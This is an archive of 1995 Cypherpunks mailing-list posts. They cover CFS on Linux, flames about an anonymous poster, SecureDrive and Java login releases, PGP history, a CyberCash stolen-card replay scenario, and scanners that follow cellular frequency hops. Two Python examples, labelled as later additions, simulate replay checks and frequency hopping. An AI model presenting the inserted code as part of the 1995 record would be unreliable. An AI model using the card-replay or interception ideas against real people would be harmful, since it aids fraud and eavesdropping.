In-Reply-To: <199512222355.SAA04987@jekyll.piermont.com>
Message-ID: <9512230029.AA27699@all.net>
MIME-Version: 1.0
Content-Type: text


> anonymous-remailer@shell.portal.com writes:
> > Everyone should ask this question.  AT&T can sign-on to a two-page ad,
> > calling on Congress to balance the budget -- to cut off veterans, and
> > cut-off women with dependent children just before Christmas.  It can
> > sign on to this, but it can't bother to even offer a scholarship to
> > the students who helped make its fortunes.  It would rather leave the
> > impression that it freeloads off of other's efforts.
> > 
> > It's shameful.
> 
> God, you are annoying Fred, ER, I meant, "Alice".

I hope you don't think I'm Alice - and I don't think Alice's first name
is Fred.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@berserk.com>
Date: Sat, 23 Dec 1995 06:55:57 +0800
To: mab@crypto.com (Matt Blaze)
Subject: Re: CFS and Linux
In-Reply-To: <199512210440.XAA28196@crypto.com>
Message-ID: <199512222107.WAA00408@asylum.berserk.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> > 
> > Is there anyone out there that has CFS running with Linux ?
> > 
> > It installs fine on BSDi 2.0 but I'm unable to install it 
> > under Linux, I would appreciate it if some one would help
> > me out.
> > 
> >  -AJ-
> 
> I don't run Linux, and every time I open my mouth it seems to provoke
> a flame-fest, but I'll risk responding anyway.
> 
> I'm told that all versions of CFS since 1.0.4 (the latest is 1.3.1)
> do work out-of-the-box under *some* releases of Linux and with some
> coaxing on the others.
> 
> I'm not sure exactly what problem you're having, but the most common
> CFS-Linux problem that people complain about has to do with the rpcgen
> output not being in the format expected by the rest of CFS.  There
> seem to be two things you can do about this:  get a version of rpcgen
> that generates the "standard" (original Sun) names for the functions it
> generates, or just grab the rpcgen output from the cfs-users mailing list
> archive ("echo help | mail cfs-users-request@research att.com" for details).
> 

I would like to thank all people who gave me pointers; with the
help of my sysadmin at Utopia we were able to compile and install it.

Two comments for Matt though:

 1: please make it install 'out-of-the-box' on Linux.

 2: please rename the ssh shell program, 
    it did overwrite my ssh/slogin program.

All things said; thanks for a really wonderful program.

 -AJ-

ps: Merry Xmas and a Happy NewYear 2all !





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 23 Dec 1995 21:52:56 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: (fwd) Java implementation of secure login protocol
Message-ID: <199512230408.XAA27975@homeport.org>
MIME-Version: 1.0
Content-Type: text


Look, Ma!  Java code!

Real cyph3rpunks, of course, flame each other anonymously.

(Incidentally, I got tired of Alice making it to my noise box, and the
following seems to work well.  Deleting the leading ^ characters would
cause all responses to go into the junk box; perhaps a good idea.
This is, for those of you who don't recognize it, procmail code.  My
mail filter of choice for hacking in.)

   :0B:
   * ^Alice de 'nonymous
   * ^P.S.  This post is in the public domain.
   | formail -a "Status: O" >> cjunk



> From: greg@qualcomm.com (Greg Noel)
> Newsgroups: comp.lang.java,sci.crypt
> Subject: Java implementation of secure login protocol
> Date: 19 Dec 1995 23:12:52 -0800
> Organization: QUALCOMM, Incorporated; San Diego, CA, USA
> Lines: 64
> Message-ID: <4b8d1k$6o9@qualcomm.com>
> NNTP-Posting-Host: guru.qualcomm.com
> 
> Please note that this article is cross-posted both to comp.lang.java and
> sci.crypt.  If you follow up, please trim the newsgroups appropriately.
> 
> Since a number of people expressed interest, I'm releasing an initial
> implementation of a secure login protocol in Java.  This is still very
> much a work in progress (it's not really even of alpha quality), but
> the protocol itself is functional.
> 
> It's intended that the classes in crypto.* and qualcomm.qbs.login.*
> live on the client; any other classes needed would be downloaded over
> the encrypted link.  Hopefully, the client-resident classes will be
> few in number and change rarely; they are just intended to bootstrap
> up the connection.  In the long run, the classes in crypto.* could be
> provided by the vendor of the Java VM.
> 
> The distribution consists of two files:
> 	ftp://ftp.qualcomm.com/pub/gnoel/java.login.tar.gz
> 	ftp://ftp.qualcomm.com/pub/gnoel/java.no-export.tar.gz
> The first file contains the logic to execute the protocol and launch
> the splash screen (see below); it also contains the base classes from
> crypto.* but no cryptographic functions.  The second file contains the
> base classes and the actual implementations of a few cryptographic
> functions to demonstrate how the base classes can be used.
> 
> For sci.crypt, I've tried to capture the essence of what cryptographic
> functions can do in the base classes, without being specific to any
> particular protocol.  I'm not completely happy with it, and would welcome
> any comments people might have on what might be missing.  It's as minimal
> as I could make it and still provide a basis for whatever protocols need
> to be implemented.
> 
> My motivation here is that Sun and Netscape are talking about defining
> a standard way of incorporating cryptographic functions in Java; it would
> be nice if the specification were usable for a lot more than the security
> protocols that come with Netscape.  (I wouldn't object to having access
> to SSL from Java---in fact, I'd really like it---but I'd also like access
> to MD5 and the like.)
> 
> This implementation of the secure login protocol uses short text strings
> to identify the packets being exchanged; that's for convenience while
> debugging---in a production implementation, it would be done differently.
> Other than that, I'd appreciate any suggestions as to how to improve the
> implementation.  (A MAC digest prefixed to the packets is something I'm
> considering, for example.)
> 
> For comp.lang.java, the splash screen is loaded over the secure connection
> but attempts to instantiate a member of the class cause a NoSuchMethodError
> to be thrown.  The class itself seems to be defined correctly, and it should
> be no different from how an applet would be loaded and instantiated, but it
> still fails.  If anyone can tell me what is going wrong and what I can do
> to fix it, the pizza and beer will be on me.  (This has been a showstopper
> for four days now and I'm getting very frustrated by it.)
> 
> The class design tries to minimize the number of classes that must be
> present in the bootstrap set; this led to a somewhat, ah, baroque set of
> functionality.  If anyone has suggestions on how this could be done better,
> I'd be pleased to hear about it.
> 
> If anyone has any questions about this, don't hesitate to drop me a line
> or post something in one of the newsgroups.  I'm going home for some sleep
> now, but I'll be banging my head against it again in the morning.
> 
> -- 
> -- Greg Noel, UNIX Guru         greg@qualcomm.com  or  greg@noel.cts.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laszlo Vecsey <master@internexus.net>
Date: Sat, 23 Dec 1995 21:49:46 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Encrypted script - sort of
In-Reply-To: <m0tTFol-00090DC@pacifier.com>
Message-ID: <Pine.LNX.3.91.951222230842.16815A-100000@micro.internexus.net>
MIME-Version: 1.0
Content-Type: text/plain


> >A tale I hear is that when HP had to deliver operating system source to
> >the french government they stripped all comments and changed all variable
> >and subroutine names to 32 byte strings of I 1 0 (zero) and O (uppercase O).
> >It still compiled but was 100% useless to human readers.

A somewhat useful utility would be one that would compress C code into as 
small space as possible, stripping out all spaces and making variable 
names one character a piece when possible. And of course one to expand it 
back into 'formatted' text, style could even be incorporated.

I'm sure a Perl fanatic knows a quick solution... I'm always amazed at 
how short Perl code is.. :)   Anyone care to take care of this utility?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: floyddb@alpha.c2.org
Date: Sat, 23 Dec 1995 19:55:55 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199512231130.DAA26556@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Dec 1995 andr0id@midwest.net (Jason Rentz) wrote:

>>        
>>
>
>The problem with the Interceptor is that I think it can only receive one
>frequency at a time, and it is adjustable by a thumb wheel, not digitally.
>This would tend to make changing frequencies at high rates VERY hard. :)
>Also it has no frequency readout, so this means that if you know what freq.
>you should be at it is hard to tune in that freq. without searching a little.  
>                        Dr0id
>
>
>( Computer Consulting & Management   )
>(P.O. Box 421  Cambria, IL 62915-0421)
>

The demo of the Interceptor I saw seemed to show it jumping from 150 MHz to 450 
MHz without any external adjustments, it locked on the strongest signal.
Granted, it can only receive one frequency at a time, but there shouldn't be any
significant delays when the phone hops a frequency.  The Interceptor's 
frequency readout is a bargraph style LED.  The Scout, from what I can
see in Optoelectronics' ad doesn't have any frequency controls on it, it does
have a digital frequency readout.  As far as timing is concerned, the Scout 
might be less useful because I think it feeds the frequency into the scanner for
reception.  Most scanners take a significant amount of time to change
frequencies.

Merry Christmas

        Floyd D. Barber
        floyddb@alpha.c2.org
        Key fingerprint:
        8A 98 1F 6B 70 7A FE 24 
        35 D4 48 CF 9D F6 B0 91





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 23 Dec 1995 17:57:15 +0800
To: "David Klur" <dklur@dttus.com>
Subject: Re: Cybercash questions...
Message-ID: <v02130503ad013a9c6992@[165.254.158.212]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:39 12/22/95, David Klur wrote:

>     The fraud possibility I see is that Bob could steal Alice's encrypted
>     credit card number (by sniffing when she buys something at Charlie's
>     Internet shop).  Then, without decrypting it, he could use it (still
>     encrypted) at Don's Internet shop, and ask Don to ship the goods to
>     Bob's address.  Since Don will not decrypt Alice's card number he will
>     not know that it is not Bob's card.  Cybercash will validate Alice's
>     card, but will not know that it is really Bob who is the customer.
>     Don will ship the goods to Bob, and Alice will get a fraudulent charge
>     on her bill.
>
>     Am I missing something?

If when Alice sends her encrypted card number to Charlie, it were encrypted
with Charlie's Public Key, then the version that Bob gets is useless if
sent to Don (since it will not decrypt with Don's Secret Key into something
that when sent to Cybercash will yield Ann's CC# when decrypted with
Cybercash's Secret Key). This still leaves the data as valid for use at
Charlie unless the actual decrypt by Charlie contains more than just the
CC#, so as to flag a "replay" attempt (ie: if the sending of the CC# is in
realtime, there could be a check field in there to validate the response as
being for the current request) and reject it.
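
The two checks discussed in this thread (tie the payment message to one merchant, and tie it to the current request) can be shown in a short added example; it is not part of the original post and is not CyberCash's protocol. It assumes an HMAC tag under a key shared by customer and processor in place of the public-key encryption the post describes, so it demonstrates binding and freshness only, and all names and values are constructed.

```python
import hashlib
import hmac
import json
import secrets


def _tag(key: bytes, fields: dict) -> str:
    """HMAC-SHA256 over a canonical encoding of the token fields."""
    msg = json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, msg, hashlib.sha256).hexdigest()


class Gateway:
    """Stand-in for the payment processor; shares one key with each customer."""

    def __init__(self):
        self._keys = {}

    def enroll(self, customer: str) -> bytes:
        self._keys[customer] = secrets.token_bytes(32)
        return self._keys[customer]

    def tag_ok(self, token: dict) -> bool:
        key = self._keys.get(token.get("customer"))
        if key is None:
            return False
        fields = {k: v for k, v in token.items() if k != "tag"}
        return hmac.compare_digest(_tag(key, fields), str(token.get("tag", "")))


class Merchant:
    """Issues a fresh challenge per order and accepts each challenge once."""

    def __init__(self, name: str, gateway: Gateway):
        self.name = name
        self.gateway = gateway
        self._outstanding = set()

    def new_challenge(self) -> str:
        nonce = secrets.token_hex(16)
        self._outstanding.add(nonce)
        return nonce

    def accept(self, token: dict) -> str:
        nonce = token.get("nonce")
        # Merchant binding: a token made out to another shop is useless here.
        if token.get("merchant") != self.name:
            return "rejected: token names another merchant"
        # Freshness: the "check field" must be a challenge this shop issued
        # and has not yet seen used.
        if not isinstance(nonce, str) or nonce not in self._outstanding:
            return "rejected: stale or unknown challenge"
        # Integrity: editing the merchant or nonce fields breaks the tag.
        if not self.gateway.tag_ok(token):
            return "rejected: bad tag"
        self._outstanding.discard(nonce)
        return "accepted"


def make_token(customer, key, merchant, nonce, card_ref):
    fields = {"customer": customer, "merchant": merchant,
              "nonce": nonce, "card_ref": card_ref}
    return dict(fields, tag=_tag(key, fields))


def demo() -> dict:
    gateway = Gateway()
    alice_key = gateway.enroll("alice")
    charlie = Merchant("charlie", gateway)
    don = Merchant("don", gateway)

    # Alice's legitimate purchase; "CARD-REF-0001" is a constructed placeholder.
    token = make_token("alice", alice_key, "charlie",
                       charlie.new_challenge(), "CARD-REF-0001")
    results = {"alice_at_charlie": charlie.accept(token)}

    captured = dict(token)  # the copy an eavesdropper would hold
    results["replay_at_don"] = don.accept(captured)

    # Rewriting the fields without Alice's key invalidates the tag.
    relabelled = dict(captured, merchant="don", nonce=don.new_challenge())
    results["relabelled_at_don"] = don.accept(relabelled)

    # The original challenge was consumed by the first purchase.
    results["replay_at_charlie"] = charlie.accept(captured)
    return results


if __name__ == "__main__":
    for case, outcome in demo().items():
        print(f"{case}: {outcome}")
```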






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Sat, 23 Dec 1995 06:37:35 +0800
To: aba@atlas.ex.ac.uk
Subject: Re: PGP timeline FAQ... comments requested
In-Reply-To: <297.9512221337@exe.dcs.exeter.ac.uk>
Message-ID: <pgpmoose.199512230812.34599@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


I've embedded a couple of comments that might be
useful.


  1.4  Amusingly Adi Shamir (A from RSA) isn't even a US citizen, he's an

Shamir is the 'S' from RSA, not the 'A'.

  1.6  Because the publication was a rush job due to the NSA, R,S & A
       and the later formed PKP and RSADSI lose patent rights
       to RSA crypto outside the US.  This is because most places
       outside the US, you have to obtain a patent *before*
       publication, where as in the US, you have one year from the
       publication date to file for patents.  This also had implications for
       PGP later

This is only half true. US Patent law was
developed independently of most of the rest of
the world's, and allowed patents like this. The
Australian patent office would, at the time, have
rejected the patent anyway on the grounds that
you can't patent a mathematical formula.

  ======================================================================
  3    USG decides they don't like PRZ
  ======================================================================

You haven't defined USG as an acronym yet. To me
it means Unix Support Group. It does come clear
later though.

regards,
Greg.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stevenw@best.com (Steven Weller)
Date: Sun, 24 Dec 1995 01:03:31 +0800
To: cypherpunks@toad.com
Subject: Re:
Message-ID: <v01530512ad01d78bc507@[206.86.1.35]>
MIME-Version: 1.0
Content-Type: text/plain


>On Fri, 22 Dec 1995 andr0id@midwest.net (Jason Rentz) wrote:
>>
>>The problem with the Interceptor is that I think it can only receive one
>>frequency at a time, and it is adjustable by a thumb wheel, not digitally.
>>This would tend to make changing frequencies at high rates VERY hard. :)
>>Also it has no frequency readout, so this means that if you know what freq.
>>you should be at it is hard to tune in that freq. without searching a
>>little.
>>                        Dr0id
>
>The demo of the Interceptor I saw seemed to show it jumping from 150 MHz
>to 450
>MHz without any external adjustments, it locked on the strongest signal.
>Granted, it can only receive one frequency at a time, but there shouldn't
>be any
>significant delays when the phone hops a frequency.  The Interceptor's
>frequency readout is a bargraph style LED.  The Scout, from what I can
>see in Optoelectronics' ad doesn't have any frequency controls on it, it does
>have a digital frequency readout.  As far as timing is concerned, the Scout
>might be less useful because I think it feeds the frequency into the
>scanner for
>reception.  Most scanners take a significant amount of time to change
>frequencies.

I used to work for a company that made frequency-hopping military radios.
It's a catch-me-if-you-can game, a bit like the amusement arcade toy where
stuffed rats pop up through holes and you try to whack them with rubber
hammers. You can sure *see* where the next one is, but you can't get there
fast enough to make contact. If you knew the pseudo-random pattern, you
could anticipate and be there every time.

Thus in a frequency-hopping radio you can push the retuning (read RF
phase-locked loop) technology to its limit and build transmitters and
receivers around them. These typically hop in the order of 100 times a
second. The adversary has to find the uncorrelated signal very quickly
indeed *and* have PLL technology at least as good as yours to recover
anything from it. Finding the signal generally means listening to all
frequencies at once, requiring huge amounts of hardware parallelism and/or
realtime computing power. Once you throw ten or so radios onto the same
band, it's no longer any use looking for the strongest signal, making that
approach useless.

The primary reason for FH is not to hide information, however. Encryption
can be used for that. It's to prevent the enemy from hiding the information
from the intended recipient through jamming. Radio jammers work by simply
drowning out all other traffic so that the receivers either clip and
distort everything or have to attenuate the input signal so far that the
interesting stuff is undetectable. Like trying to have an intellectual
conversation at a bad rock concert. By employing FH you require the enemy
to have enormous and impractical jamming capacity. There are FH radars too.



-------------------------------------------------------------------------
Steven Weller                      |  "The Internet, of course, is more
                                   |  than just a place to find pictures
                                   |  of people having sex with dogs."
stevenw@best.com                   |       -- Time Magazine, 3 July 1995
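
The numbers behind the post above can be put in a small simulation, added here as an example that is not part of the original message. It assumes a 64-channel band and a hop pattern derived from a shared key with HMAC-SHA256; the post does not say how real radios generate their pattern, and the keys are constructed.

```python
import hashlib
import hmac

CHANNELS = 64      # assumed number of channels in the band
SLOTS = 10_000     # 100 seconds at the ~100 hops per second the post mentions


def channel(key: bytes, slot: int, channels: int = CHANNELS) -> int:
    """Channel used in a given time slot, derived from the shared key."""
    digest = hmac.new(key, slot.to_bytes(8, "big"), hashlib.sha256).digest()
    return int.from_bytes(digest[:8], "big") % channels


def hop_sequence(key: bytes, slots: int = SLOTS) -> list:
    return [channel(key, s) for s in range(slots)]


def fraction_followed(rx_key: bytes, tx_key: bytes, slots: int = SLOTS) -> float:
    """Share of slots in which a receiver keyed with rx_key is tuned to the
    channel the transmitter (keyed with tx_key) is actually using."""
    tx = hop_sequence(tx_key, slots)
    rx = hop_sequence(rx_key, slots)
    return sum(a == b for a, b in zip(tx, rx)) / slots


def fraction_lost(key: bytes, jammed: set, slots: int = SLOTS) -> float:
    """Share of slots that land on a channel the jammer is covering."""
    return sum(c in jammed for c in hop_sequence(key, slots)) / slots


def demo() -> dict:
    shared = b"constructed-shared-hop-key"   # held by both ends of the link
    other = b"constructed-outsider-guess"    # a listener without the pattern
    return {
        # Knowing the pattern means being on the right channel every time.
        "intended_receiver": fraction_followed(shared, shared),
        # Without it, a single-channel receiver is right about 1/64 of the time.
        "outsider": fraction_followed(other, shared),
        # Jamming 4 of 64 channels costs the link only about 4/64 of its slots.
        "jam_4_channels": fraction_lost(shared, {0, 1, 2, 3}),
        # Denying the link entirely means covering the whole band.
        "jam_all_channels": fraction_lost(shared, set(range(CHANNELS))),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value:.4f}")
```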






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Sat, 23 Dec 1995 17:16:24 +0800
To: Dan Harmon <harmon@tenet.edu>
Subject: Re: Cypherpunks resumes?
In-Reply-To: <acfef043040210048277@[205.199.118.202]>
Message-ID: <Pine.BSD.3.91.951223072333.16731B-100000@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain



Dan Harmon wrote: 

> and pose the question 
> 'who the fuck are you.?'

    good choice of expletives.... 

    'who the fuck are you.?'  --nobody, I guess. 

	I have a Piled higher and Deeper in information techniques
    from Zuerich (undergrad at Harvard in physical chemistry --boring);
    I've been around since before the dawn of arpa net, probably as long 
    as TCMay --but I've never held a "job"; 
	I've personally coded two 250,000+ line packages which made me
    more than comfortable, even if one did go down the black hole (and
    countless other things like the bit-slice firmware to replace the
    B3500s in missile silos); 
	I have been charged with crypto offenses by the Feds; and, I have
    been charged with "treasonable" technology export by the Feds; and, a
    long time ago did more than one tour in USMC special operations in SE 
    Asia --as a BNCO and chopper pilot. 
	Oh, yeah, I forgot, I hold a license to practice before the court
    in a couple European countries. 

    read the following while playing 'Hotel California'

	So, who the fuck am I?  --just another aging 300 lb gorilla, 
    long haired hippie California freak with an outlaw chopper. 

	So, who am I?  Nobody, I guess  -just attila.










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Edgar Swank <edgar@Garg.Campbell.CA.US>
Date: Sun, 24 Dec 1995 02:34:05 +0800
To: Cypherpunks          <cypherpunks@toad.com>
Subject: Announcing SecureDrive 1.4a
Message-ID: <quPkgD4w165w@Garg.Campbell.CA.US>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

This is to announce the availability of Version 1.4a of SecureDrive.

SecureDrive Version 1.4a replaces version 1.4, 1.3d, and previous
versions.

Release 1.4a is a maintenance release of 1.4. No new function is added.

Only module SDCOMMON.C has a non-cosmetic change, which affects
executables LOGIN.EXE and CRYPTDSK.EXE. For that reason, all other
executables still self-identify as release 1.4. They are in fact the
exact same EXE & COM files as release 1.4.

1.4a fixes a problem decrypting or activating a diskette or disk
partition encrypted with both a passphrase and a keyfile.

There are also some minor changes in SECDRV.DOC.

In the USA, SecureDrive 1.4a is not available at

    Colorado Catacombs BBS - 303-772-1062 (up to 28,800 bps, 8n1) -
    log in with your own name or alias.  Download SECDR14A.ZIP from
    the [F]ile menu.

    see ftp://ftp.csn.net/mpj/README for the ???????  in
    ftp://ftp.csn.net/mpj/I_will_not_export/crypto_???????/disk/secdr14a.zip

    See ftp://miyako.dorm.duke.edu/pub/GETTING_ACCESS for access to
    ftp://miyako.dorm.duke.edu/mpj/crypto/link/mpj/disk/secdr14a.zip

These are all controlled-access sites available to USA citizens and
residents only.

Thanks to the cooperation of Steve Crompton of the U.K., who worked
with me closely, I am able to also announce availability on an
offshore site,

  ftp://utopia.hacktic.nl/pub/replay/pub/incoming/SECDR14A.ZIP

If you perchance don't find it there try directories

    /pub/replay/pub/crypto/CRYPTOapps
    /pub/replay/pub/disk

which currently contains previous versions of SecureDrive. But as I
write, SECDR14A.ZIP has been left in the incoming directory for
several days.

Steve also uploaded 1.4a to

    ftp.ox.ac.uk/incoming

But it has been removed from there and has (so far) not reappeared
elsewhere. But previous versions are in directory

    pub/crypto/misc

so it might be worth checking there from time to time.

In case anyone in the U.S. Justice Dept. is reading this, Steve and I
were very careful to do this release without violating US export
restrictions. The only things I "exported" to Steve were "diffs" for
source changes from 1.4 to 1.4a, which themselves don't contain any
code capable of encryption or decryption. Steve combined those with
source for 1.4, which "leaked" from the US sites where I released it
months ago.

Steve compiled the new source code, and sent the new EXE files to me.
I compared the new executables to ones I compiled myself and verified
they match, bit for bit.  I then sent back to Steve detached signature
files for the executables.  Steve then put together SECDR14A.ZIP and
sent that to me for final inspection.  I then compared all files
against my "master" files here and verified that they matched. I then
shipped the SECDR14A.ZIP that Steve sent me to the USA sites. So the
USA release matches bit for bit the offshore release.

Here are the contents of SECDR14A.ZIP

 Length  Method   Size  Ratio   Date    Time    CRC-32  Attr  Name
 ------  ------   ----- -----   ----    ----   -------- ----  ----
  18321  DeflatN   6923  63%  06-14-93  22:27  0767480b --w-  COPYING
   2022  DeflatN    789  61%  08-06-95  00:00  dd3e9e64 --w-  COPYSECT.C
  12542  DeflatN   7674  39%  08-06-95  00:00  c089888f --w-  COPYSECT.EXE
    152  Stored     152   0%  08-06-95  00:00  17b02bc2 --w-  COPYSECT.SIG
  19664  DeflatN   4241  79%  11-19-93  21:42  22c2502c --w-  CRYPT2.ASM
  19625  DeflatN   4618  77%  11-10-95  16:11  3a6b64fe --w-  CRYPTDSK.C
  41898  DeflatN  19879  53%  11-14-95  18:59  26bc0200 --w-  CRYPTDSK.EXE
   4353  DeflatN   1723  61%  08-06-95  00:00  b4e99e6a --w-  FPART.C
  15450  DeflatN   9794  37%  08-06-95  00:00  44c4a0e7 --w-  FPART.EXE
    152  Stored     152   0%  08-06-95  00:00  0b345a16 --w-  FPART.SIG
   5278  DeflatN   3468  35%  11-14-95  20:52  af2f141c --w-  KEY.ASC
  18450  DeflatN   4541  76%  11-10-95  16:13  c5ad8fa4 --w-  LOGIN.C
  43558  DeflatN  20297  54%  11-14-95  18:59  cfd0bd3b --w-  LOGIN.EXE
    278  DeflatN    250  11%  12-06-95  20:33  6c13428c --w-  FILE_ID.DIZ
   1554  DeflatN    568  64%  08-06-95  00:00  3589f489 --w-  MAKEFILE
  11557  DeflatN   3315  72%  05-09-93  19:38  e71f3eea --w-  MD5.C
   3407  DeflatN   1104  68%  05-11-93  12:49  f1f58517 --w-  MD5.H
   1355  DeflatN    629  54%  01-21-94  08:44  db63ade4 --w-  RLDBIOS.ASM
  14819  DeflatN   4087  73%  11-14-95  18:56  592274c6 --w-  SDCOMMON.C
  52551  DeflatN  19113  64%  12-06-95  15:33  cf5e3ded --w-  SECDRV.DOC
   3656  DeflatN   1098  70%  08-06-95  00:00  6ed75bcc --w-  SECDRV.H
  32595  DeflatN   8906  73%  08-06-95  00:00  1c7d2225 --w-  SECTSR.ASM
   2000  DeflatN   1326  34%  08-06-95  00:00  ba1568d1 --w-  SECTSR.COM
    152  Stored     152   0%  08-06-95  00:00  3817512c --w-  SECTSR.SIG
  11519  DeflatN   2864  76%  08-06-95  00:00  060d33e8 --w-  SETENV.ASM
   1254  DeflatN    541  57%  05-09-93  19:39  182978aa --w-  USUALS.H
    152  Stored     152   0%  12-06-95  17:05  2d1c5fc9 --w-  CRYPTDSK.SIG
    152  Stored     152   0%  12-06-95  17:10  8dae8ad5 --w-  LOGIN.SIG
 ------          ------  ---                                  -------
 338466          128508  63%                                       28

Also note that the ZIP file contains PGP detached signatures (*.SIG)
for the executable files.  Finally here is my public key, also
available on many public keyservers; note who has signed it. Also
please note my present Email address.

Edgar Swank   <edgar@Garg.Campbell.CA.US>

(Only Garg ID is now valid)
Type bits/keyID    Date        User ID
pub  1024/DA87C0C7 1992/10/17  Edgar Swank   <edgar@Garg.Campbell.CA.US>
sig       32DD98D9               Vesselin V. Bontchev <bontchev@complex.is>
sig       0F59323D               Albert Yee <sa3189049@ntuvax.ntu.ac.sg>
sig       DA87C0C7               Edgar Swank   <edgar@Garg.Campbell.CA.US>
                               Edgar W. Swank <edgar@spectrx.sbay.org>
sig       91E71221               Cruz <cruz@ccxbbs.uunet.ve>
sig       DA87C0C7               Edgar Swank   <edgar@Garg.Campbell.CA.US>
sig       C0595F91               Ian H. Chan <ianchan@iti.gov.sg>
sig       61130A1B               Arnold L. Cornez, J.D. <arniec@dnai.com>
sig       18239E91               Robert C.Casas <73763.20@compuserve.com>
sig       4AAF00E5               Dave Del Torto <ddt@lsd.com>
sig       08B707C5               Anton Sherwood <dasher@netcom.com>
sig       32DD98D9               Vesselin V. Bontchev <bontchev@complex.is>
sig       34D74DC1               Peter Simons <simons@peti.rhein.de>
                               Edgar W. Swank <edgar@spectrx.saigon.com>
sig       08B707C5               Anton Sherwood <dasher@netcom.com>
sig       32DD98D9               Vesselin V. Bontchev <bontchev@complex.is>
sig       FF67F70B               Philip R. Zimmermann <prz@sage.cgd.ucar.edu>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMNszct4nNf3ah8DHAQHBGQQAhbb0ZCJ3iiB096HxJac33XFTxG/GwNB4
4nWN5/I2s8Cve/USUGVC9YIHKV7NHkHn0Pybo727w46am6DMLoQTdnPzR2O+C+TY
mozxnwDYfznzWCzjqadHOsPRK9/ix8aB2ThfGsNaAvOgVjvnDg/uG8ztLwW/G1Hv
L/zVBh8nIs0=
=YArx
-----END PGP SIGNATURE-----

-- 
edgar@Garg.Campbell.CA.US (Edgar Swank)
The Land of Garg BBS -- +1 408 378-5108




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Sun, 24 Dec 1995 03:09:06 +0800
To: cypherpunks@toad.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
Message-ID: <199512231817.KAA24182@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Dec 1995, Perry E. Metzger wrote:

> anonymous-remailer@shell.portal.com writes:
> > Everyone should ask this question.  AT&T can sign-on to a two-page ad,
> > calling on Congress to balance the budget -- to cut off veterans, and
> > cut-off women with dependent children just before Christmas.  It can
> > sign on to this, but it can't bother to even offer a scholarship to
> > the students who helped make its fortunes.  It would rather leave the
> > impression that it freeloads off of other's efforts.
> 
> God, you are annoying Fred, ER, I meant, "Alice".

My dearest Perry. 

I am not Fred.  I am not he.  He is not me. Got it??  We aren't even in
the same category or the same country.  Fred's an American, and I am not. 

Scary, isn't it??  A non-American ...

Oh ... and a Happy Ho Ho to ya, Perry.  My own best wishes. (just in case 
you didn't get my email, which wished the same, I mean).

And _none_ of this changes the fact that AT&T and Netscape are my 
personal nominees for the "Christmas Net Scrooge" award.  

Anyone willing to second that??



Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 24 Dec 1995 01:03:40 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux (fwd)
Message-ID: <199512231633.KAA04297@einstein>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Subject: Re: CFS and Linux 
> Date: Sat, 23 Dec 1995 11:15:40 -0500
> From: "Perry E. Metzger" <perry@piermont.com>
> 
> Alice B. Cohen writes:
> anonymous-remailer@shell.portal.com writes:
> > >  1: please make it install 'out-of-the-box' on Linux.
> > 
> > AT&T's refusal to support CFS and other so-called "secure" software
> > under Linux is typical and to be expected.
> 
> God, you are an obnoxious prick.
> 

Ditto.

> First of all, this is Matt Blaze's pet project, not a product of
> AT&T. It is given away for free and you should be happy to get it at
> all -- no one is obligated to give you a gift. Have you mailed him a
> Linux machine to do his testing on? Why do you assume he even has one?
> As it happens, he doesn't, and probably doesn't want to go through the
> hassle of paying for a computer and putting Linux on it.
> 
> Be happy he's given you anything at all.
> 
> Perry
> 

If you are going to do it, do it right the first time.

Second, I really doubt Blaze has a problem obtaining access to computing
power and a $25 CD should be within his budget.

Merry Christmas.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Sun, 24 Dec 1995 03:47:48 +0800
To: perry@piermont.com (Perry E. Metzger)
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <199512231823.NAA07160@jekyll.piermont.com>
Message-ID: <199512231904.LAA00483@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain


 
 
> I thought people would love to see this.
> 
> Note especially "Dr." Fred's threat to have toad.com confiscated as
> part of a conspiracy against his reputation.

I'm sure a number of people, myself included, would be willing
to host the CP list should "Dr" Fred make good his threat.

I'd even be willing to testify in court as to the nature of
Fred's reputation.  I'm sure the operator of the Firewalls list
would be too.


-- 
